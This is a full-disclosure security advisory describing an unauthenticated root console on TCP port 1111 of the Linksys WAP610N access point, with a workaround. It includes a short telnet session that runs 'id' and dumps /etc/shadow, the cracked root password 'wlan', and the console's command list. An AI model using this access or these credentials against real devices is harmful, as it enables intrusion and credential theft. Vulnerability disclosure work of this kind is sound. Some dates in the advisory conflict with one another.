Secure Network - Security Research Advisory Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges Systems affected: WAP610N (Firmware Version: 1.0.01) Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.linksysbycisco.com Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it Vendor disclosure: 14/06/2010 Vendor acknowledged: 14/06/2010 Vendor bugfix: 14/12/2010 (reply to our request for update) Vendor patch release: ?? Public disclosure: 10/02/2010 Advisory number: SN-2010-08 Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt *** SUMMARY *** Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft. Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user. *** VULNERABILITY DETAILS *** telnet 1111 Command> system id Output> uid=0(root) gid=0(root) Coomand> system cat /etc/shadow Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7::: Ouptup> bin:*:10933:0:99999:7::: Ouptup> daemon:*:10933:0:99999:7::: Ouptup> adm:*:10933:0:99999:7::: Ouptup> lp:*:10933:0:99999:7::: Ouptup> sync:*:10933:0:99999:7::: Ouptup> shutdown:*:10933:0:99999:7::: Ouptup> halt:*:10933:0:99999:7::: Ouptup> uucp:*:10933 root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net) List of console's command: ATHENA_READ ATHENA_WRITE CHIPVAR_GET DEBUGTABLE DITEM DMEM DREG16 DREG32 DREG8 DRV_CAT_FREE DRV_CAT_INIT DRV_NAME_GET DRV_VAL_GET DRV_VAL_SET EXIT GENIOCTL GETMIB HELP HYP_READ HYP_WRITE HYP_WRITEBUFFER ITEM16 ITEM32 ITEM8 ITEMLIST MACCALIBRATE MACVARGET MACVARSET MEM_READ MEM_WRITE MTAPI PITEMLIST PRINT_LEVEL PROM_READ PROM_WRITE READ_FILE REBOOT RECONF RG_CONF_GET RG_CONF_SET RG_SHELL SETMIB SHELL STR_READ STR_WRITE SYSTEM TEST32 TFTP_GET TFTP_PUT VER *** EXPLOIT *** Attackers may exploit these issues through a common telnet client as explained above. *** FIX INFORMATION *** No patch is available. *** WORKAROUNDS *** Put access points on separate wired network and filter network traffic to/from 1111 tcp port. ********************* *** LEGAL NOTICES *** ********************* Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is copyright 2009 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible. E-mail: securenetwork@securenetwork.it GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 02 24 12 67 88 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/